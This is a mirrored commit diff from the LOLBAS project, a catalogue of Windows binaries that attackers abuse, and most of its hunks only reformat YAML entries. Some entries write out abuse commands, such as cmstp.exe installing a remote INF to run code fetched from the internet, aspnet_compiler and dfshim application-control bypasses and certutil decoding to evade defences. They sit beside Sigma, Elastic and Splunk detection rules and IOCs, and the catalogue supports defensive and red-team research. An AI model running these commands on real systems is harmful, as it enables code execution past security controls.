mirror of
				https://github.com/LOLBAS-Project/LOLBAS
				synced 2025-10-25 14:55:19 +02:00 
			
		
		
		
	Merge branch 'master' into alias_introduction
This commit is contained in:
		| @@ -20,4 +20,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Wade Hickey | ||||
|     Handle: '@notwhickey' | ||||
| --- | ||||
|   | ||||
| @@ -1,28 +1,27 @@ | ||||
| --- | ||||
| Name: Aspnet_Compiler.exe | ||||
| Description: ASP.NET Compilation Tool | ||||
| Author: Jimmy (@bohops) | ||||
| Created: 2021-09-26 | ||||
| Commands: | ||||
|   - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u | ||||
|     Description: Execute C# code with the Build Provider and proper folder structure in place. | ||||
|     Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | ||||
|   - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe | ||||
| Code_Sample: | ||||
|   - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder | ||||
| Detection: | ||||
|   - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml | ||||
| Resources: | ||||
|   - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ | ||||
|   - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 | ||||
| Acknowledgement: | ||||
|   - Person: cpl | ||||
|     Handle: '@cpl3h' | ||||
| --- | ||||
| --- | ||||
| Name: Aspnet_Compiler.exe | ||||
| Description: ASP.NET Compilation Tool | ||||
| Author: Jimmy (@bohops) | ||||
| Created: 2021-09-26 | ||||
| Commands: | ||||
|   - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u | ||||
|     Description: Execute C# code with the Build Provider and proper folder structure in place. | ||||
|     Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | ||||
|   - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe | ||||
| Code_Sample: | ||||
|   - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder | ||||
| Detection: | ||||
|   - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml | ||||
| Resources: | ||||
|   - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ | ||||
|   - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 | ||||
| Acknowledgement: | ||||
|   - Person: cpl | ||||
|     Handle: '@cpl3h' | ||||
|   | ||||
| @@ -23,7 +23,7 @@ Detection: | ||||
|   - IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1. | ||||
| Resources: | ||||
|   - Link: https://freddiebarrsmith.com/at.txt | ||||
|   - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator | ||||
|   - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html | ||||
|   - Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems | ||||
| Acknowledgement: | ||||
|   - Person: 'Freddie Barr-Smith' | ||||
| @@ -34,4 +34,3 @@ Acknowledgement: | ||||
|     Handle: | ||||
|   - Person: 'Xabier Ugarte-Pedrero' | ||||
|     Handle: | ||||
| --- | ||||
|   | ||||
| @@ -14,17 +14,14 @@ Commands: | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\Atbroker.exe | ||||
|   - Path: C:\Windows\SysWOW64\Atbroker.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml | ||||
|  - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration | ||||
|  - IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs | ||||
|  - IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml | ||||
|   - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration | ||||
|   - IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs | ||||
|   - IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware | ||||
| Resources: | ||||
|   - Link: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ | ||||
| Acknowledgement: | ||||
|   - Person: Adam | ||||
|     Handle: '@hexacorn' | ||||
| --- | ||||
|   | ||||
| @@ -48,4 +48,3 @@ Acknowledgement: | ||||
|     Handle: '@aionescu' | ||||
|   - Person: Asif Matadar | ||||
|     Handle: '@d1r4c' | ||||
| --- | ||||
|   | ||||
| @@ -46,7 +46,7 @@ Detection: | ||||
|   - IOC: bitsadmin creates new files | ||||
|   - IOC: bitsadmin adds data to alternate data stream | ||||
| Resources: | ||||
|   - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53 | ||||
|   - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 | ||||
|   - Link: https://www.youtube.com/watch?v=_8xJaaQlpBo | ||||
|   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
| Acknowledgement: | ||||
| @@ -56,4 +56,3 @@ Acknowledgement: | ||||
|     Handle: '@carnal0wnage' | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
|   | ||||
| @@ -34,4 +34,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Ensar Samil | ||||
|     Handle: '@sblmsrsn' | ||||
| --- | ||||
|   | ||||
| @@ -32,4 +32,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: David Middlehurst | ||||
|     Handle: '@dtmsecurity' | ||||
| --- | ||||
|   | ||||
| @@ -39,7 +39,7 @@ Commands: | ||||
|     Privileges: User | ||||
|     MitreID: T1140 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: certutil --decodehex encoded_hexadecimal_InputFileName | ||||
|   - Command: certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName | ||||
|     Description: Command to decode a hexadecimal-encoded file decodedOutputFileName | ||||
|     Usecase: Decode files to evade defensive measures | ||||
|     Category: Decode | ||||
| @@ -75,4 +75,3 @@ Acknowledgement: | ||||
|   - Person: egre55 | ||||
|     Handle: '@egre55' | ||||
|   - Person: Lior Adar | ||||
| --- | ||||
|   | ||||
| @@ -21,17 +21,14 @@ Commands: | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\cmd.exe | ||||
|   - Path: C:\Windows\SysWOW64\cmd.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml | ||||
|  - IOC: cmd.exe executing files from alternate data streams. | ||||
|  - IOC: cmd.exe creating/modifying file contents in an alternate data stream. | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml | ||||
|   - IOC: cmd.exe executing files from alternate data streams. | ||||
|   - IOC: cmd.exe creating/modifying file contents in an alternate data stream. | ||||
| Resources: | ||||
|   - Link: https://twitter.com/yeyint_mth/status/1143824979139579904 | ||||
| Acknowledgement: | ||||
|   - Person: r0lan | ||||
|     Handle: '@yeyint_mth' | ||||
| --- | ||||
|   | ||||
| @@ -14,14 +14,11 @@ Commands: | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\cmdkey.exe | ||||
|   - Path: C:\Windows\SysWOW64\cmdkey.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml | ||||
| Resources: | ||||
|   - Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation | ||||
|   - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey | ||||
| Acknowledgement: | ||||
|   - Person: | ||||
|     Handle: | ||||
| --- | ||||
|   | ||||
| @@ -23,4 +23,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Elliot Killick | ||||
|     Handle: '@elliotkillick' | ||||
| --- | ||||
|   | ||||
| @@ -14,24 +14,22 @@ Commands: | ||||
|   - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf | ||||
|     Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. | ||||
|     Usecase: Execute code hidden within an inf file. Execute code directly from Internet. | ||||
|     Category: AwL bypass | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1218.003 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\cmstp.exe | ||||
|   - Path: C:\Windows\SysWOW64\cmstp.exe | ||||
| Code_Sample: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml | ||||
|  - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml | ||||
|  - IOC: Execution of cmstp.exe without a VPN use case is suspicious | ||||
|  - IOC: DotNet CLR libraries loaded into cmstp.exe | ||||
|  - IOC: DotNet CLR Usage Log - cmstp.exe.log | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml | ||||
|   - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml | ||||
|   - IOC: Execution of cmstp.exe without a VPN use case is suspicious | ||||
|   - IOC: DotNet CLR libraries loaded into cmstp.exe | ||||
|   - IOC: DotNet CLR Usage Log - cmstp.exe.log | ||||
| Resources: | ||||
|   - Link: https://twitter.com/NickTyrer/status/958450014111633408 | ||||
|   - Link: https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80 | ||||
| @@ -44,4 +42,3 @@ Acknowledgement: | ||||
|     Handle: '@oddvarmoe' | ||||
|   - Person: Nick Tyrer | ||||
|     Handle: '@NickTyrer' | ||||
| --- | ||||
|   | ||||
| @@ -29,4 +29,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Ialle Teixeira | ||||
|     Handle: '@NtSetDefault' | ||||
| --- | ||||
|   | ||||
| @@ -24,4 +24,3 @@ Acknowledgement: | ||||
|     Handle: '@hexacorn' | ||||
|   - Person: Wietze | ||||
|     Handle: '@wietze' | ||||
| --- | ||||
|   | ||||
| @@ -15,16 +15,16 @@ Full_Path: | ||||
|   - Path: C:\Windows\System32\control.exe | ||||
|   - Path: C:\Windows\SysWOW64\control.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/e8b633f54fce88e82b1c3d5e7c7bfa7d3d0beee7/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_control_dll_load.yml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml | ||||
|  - IOC: Control.exe executing files from alternate data streams | ||||
|  - IOC: Control.exe executing library file without cpl extension  | ||||
|  - IOC: Suspicious network connections from control.exe | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/e8b633f54fce88e82b1c3d5e7c7bfa7d3d0beee7/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_control_dll_load.yml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml | ||||
|   - IOC: Control.exe executing files from alternate data streams | ||||
|   - IOC: Control.exe executing library file without cpl extension | ||||
|   - IOC: Suspicious network connections from control.exe | ||||
| Resources: | ||||
|   - Link: https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/ | ||||
|   - Link: https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/ | ||||
| @@ -34,4 +34,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Jimmy | ||||
|     Handle: '@bohops' | ||||
| --- | ||||
|   | ||||
| @@ -22,16 +22,15 @@ Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc.yml | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc_folder.yml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml | ||||
|  - IOC: Csc.exe should normally not run as System account unless it is used for development. | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc_folder.yml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml | ||||
|   - IOC: Csc.exe should normally not run as System account unless it is used for development. | ||||
| Resources: | ||||
|   - Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe | ||||
| Acknowledgement: | ||||
|   - Person: | ||||
|     Handle: | ||||
| --- | ||||
|   | ||||
| @@ -15,22 +15,21 @@ Full_Path: | ||||
|   - Path: C:\Windows\System32\cscript.exe | ||||
|   - Path: C:\Windows\SysWOW64\cscript.exe | ||||
| Code_Sample: | ||||
|  - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_script_execution.yml | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/sysmon_susp_clr_logs.yml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml | ||||
|  - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml | ||||
|  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules | ||||
|  - IOC: Cscript.exe executing files from alternate data streams | ||||
|  - IOC: DotNet CLR libraries loaded into cscript.exe | ||||
|  - IOC: DotNet CLR Usage Log - cscript.exe.log | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_script_execution.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/sysmon_susp_clr_logs.yml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml | ||||
|   - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml | ||||
|   - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules | ||||
|   - IOC: Cscript.exe executing files from alternate data streams | ||||
|   - IOC: DotNet CLR libraries loaded into cscript.exe | ||||
|   - IOC: DotNet CLR Usage Log - cscript.exe.log | ||||
| Resources: | ||||
|   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|   - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
|   | ||||
| @@ -27,4 +27,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Ialle Teixeira | ||||
|     Handle: '@NtSetDefault' | ||||
| --- | ||||
|   | ||||
| @@ -26,4 +26,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Gal Kristal | ||||
|     Handle: '@gal_kristal' | ||||
| --- | ||||
|   | ||||
| @@ -7,7 +7,7 @@ Commands: | ||||
|   - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo | ||||
|     Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) | ||||
|     Usecase: Use binary to bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| @@ -17,13 +17,12 @@ Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml | ||||
| Resources: | ||||
|   - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf | ||||
|   - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
|   | ||||
| @@ -35,4 +35,3 @@ Acknowledgement: | ||||
|     Handle: '@tim8288' | ||||
|   - Person: Hai Vaknin | ||||
|     Handle: '@vakninhai' | ||||
| --- | ||||
|   | ||||
| @@ -22,15 +22,14 @@ Full_Path: | ||||
|   - Path: C:\Windows\System32\diskshadow.exe | ||||
|   - Path: C:\Windows\SysWOW64\diskshadow.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_diskshadow.yml | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/b3df5bf325461df9bcfeb051895b0c8dc3258234/rules/windows/process_creation/win_shadow_copies_deletion.yml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml | ||||
|  - IOC: Child process from diskshadow.exe | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_diskshadow.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/b3df5bf325461df9bcfeb051895b0c8dc3258234/rules/windows/process_creation/win_shadow_copies_deletion.yml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml | ||||
|   - IOC: Child process from diskshadow.exe | ||||
| Resources: | ||||
|   - Link: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ | ||||
| Acknowledgement: | ||||
|   - Person: Jimmy | ||||
|     Handle: '@bohops' | ||||
| --- | ||||
|   | ||||
| @@ -15,10 +15,10 @@ Full_Path: | ||||
|   - Path: C:\Windows\System32\Dnscmd.exe | ||||
|   - Path: C:\Windows\SysWOW64\Dnscmd.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml | ||||
|  - IOC: Dnscmd.exe loading dll from UNC/arbitrary path | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml | ||||
|   - IOC: Dnscmd.exe loading dll from UNC/arbitrary path | ||||
| Resources: | ||||
|   - Link: https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 | ||||
|   - Link: https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html | ||||
| @@ -32,4 +32,3 @@ Acknowledgement: | ||||
|     Handle: '@dim0x69' | ||||
|   - Person: Nikhil SamratAshok | ||||
|     Handle: '@nikhil_mitt' | ||||
| --- | ||||
|   | ||||
| @@ -50,14 +50,14 @@ Full_Path: | ||||
|   - Path: C:\Windows\System32\esentutl.exe | ||||
|   - Path: C:\Windows\SysWOW64\esentutl.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_esentutl_activity.yml | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/bacb44ab972343358bae612e4625f8ba2e043573/rules/windows/process_creation/process_susp_esentutl_params.yml | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_copying_sensitive_files_with_credential_data.yml | ||||
|  - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_esentutl_activity.yml | ||||
